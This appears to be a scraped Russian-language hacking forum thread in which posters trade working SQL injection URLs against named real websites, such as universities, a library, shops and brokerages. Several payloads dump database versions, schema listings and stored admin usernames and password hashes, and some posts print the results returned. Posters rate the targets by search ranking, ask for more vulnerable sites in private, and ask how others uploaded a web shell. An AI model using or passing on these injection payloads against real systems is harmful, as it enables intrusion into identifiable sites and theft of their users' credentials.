Code: http://gameleader.ru/showfull.php?gameid=-1262%27+union+select+1,2,3,4,version%28%29,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--+f
The Marian Library. Code: http://campus.udayton[COLOR=Red].edu[/COLOR]/mary/resources/links/linkdisplay.php3?catnum=1-1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())-- Database Version: 5.0.41-log Database name: marylinks User name: mary@localhost ТИЦ: 20 PR: 3 Официальный сайт коммерческого игрового движка Blitz3D. Code: http://www.blitzbasic.com/codearcs/codearcs.php?code=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8-- Database Version: 5.1.56-log Database name: blitzbas_db User name: blitzbas_bman@localhost ТИЦ: 40 PR: 5
Code: http://www.pocketgpsworld.com/sub-menu.php?idCat=9+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
http://www.emuanime.cl/tienda.php?id=-77'+union+select+1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+wp_users+--+ http://www.donaticus-him.ru/view_product.php?id=-7'+union+select+1,2222,3,4,version()+--+ http://www.clovekvtisni.cz/index2en.php?id=642+and+1=0+union+select+1,concat(email,0x3a,password),3+from+users+--+ http://shadesoptical.com/blog.php?id=-24+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8,9+from+shades_optical.users+limit+1,1+--+
http://www.webgari.com/top/siteinfo.php?count=6154%27+union+select+1,2,3,version%28%29,5,6,7,8,9,0,1,2,3,4--+
Code: http://tv.teletrade.com.ua/index.php?cat=12&subcat=999999.9'+union+all+select+1,concat(0x7e,0x27,unhex(Hex(cast(database()+user()+as+char))),0x27,0x7e),2,3,4,5,6,7+and+'x'='x ^^^^^^^^^ Current User: root@localhost Это: http://www.teletrade.com.ua/ 275тиц 6pr http://masterbrok.com.ua/ 30тиц 4pr http://www.dengi-info.com/ 600тиц 4pr http://tv.teletrade.com.ua/ 10тиц 3pr И plesk бд и mysql included. Наслаждайтесь. p.s. а я по таким крутым не лажу... вера не позволяет и skills. стремно. p.s.s. буду благодарен за пару ненулевых сайтов с бубликами женской/детской тематики в приват =)
Интересный подзапрос. Code: http://www.hawk.ru/foto_gallery.php?id_gal=-27%20union%20select%200x27,0x2D3120756E696F6E2073656C65637420312C636F6E6361745F777328307833622C646174616261736528292C7573657228292C76657273696F6E2829292C332C342C35202D2D2066%20--%20f
PR=5 Code: http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-1+union+select+1,concat_ws%280x3a,host,user,password%29,3,4,5,6+from+mysql.user-- DB: Code: information_schema administrator_documents athletic career_lab cie continuing_ed deptpages distance_ed drupal form_data foundations helpdesk inventory joomla lrc maintenance mediawiki messagebord misrequest mysql offsitelinks CY=550 PR=7 Code: http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29,2,3,4,5+--+
Но комментс http://www.flb.ru/index_open.php?info_id=-49931/**//*!union*//**//*!select*//**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+&kpk=1
_http://www.trooder.com/directory/show.php?id=84015+union+select+1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0,11,12,13,14,15,16,17,18,19+--+ _http://smaa-hq.com/bio.php?bioid=-21+union+select+1,2,version(),4,5,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),7,8,99+--+ _http://www.libonline.ru/index.php?id=833399999999+union+select+1,2,version(),4,5,6,7+--+
pro-kinder.com.ua 5.1.50 Яндекс тИЦ (CY) 70 Google PageRank (PR) 3 donbazar.ru 5.1.49-rel11.3-log Яндекс тИЦ (CY) 10 Google PageRank (PR) 1
PR 2 PHP: http://masscool.com/category.php?pid=125%20union%20select%201,2,concat_ws%280x3a,@@version,user%28%29,database%28%29%29,4,5,6,7,8--
PR 3 PHP: http://wrigroup.ca/index.php?catid=-183%20UNION%20SELECT%20concat_ws%280x3a,username,password,email,accesslevel%29,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29+from+cfaq_admin
Code: http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+15,1 //для вопросов есть другая тема
Тиц - 10 PR - 6 Кто сможет залить шелл отпишитесь как вы это сделали,если не трудно =) просто ради опыта.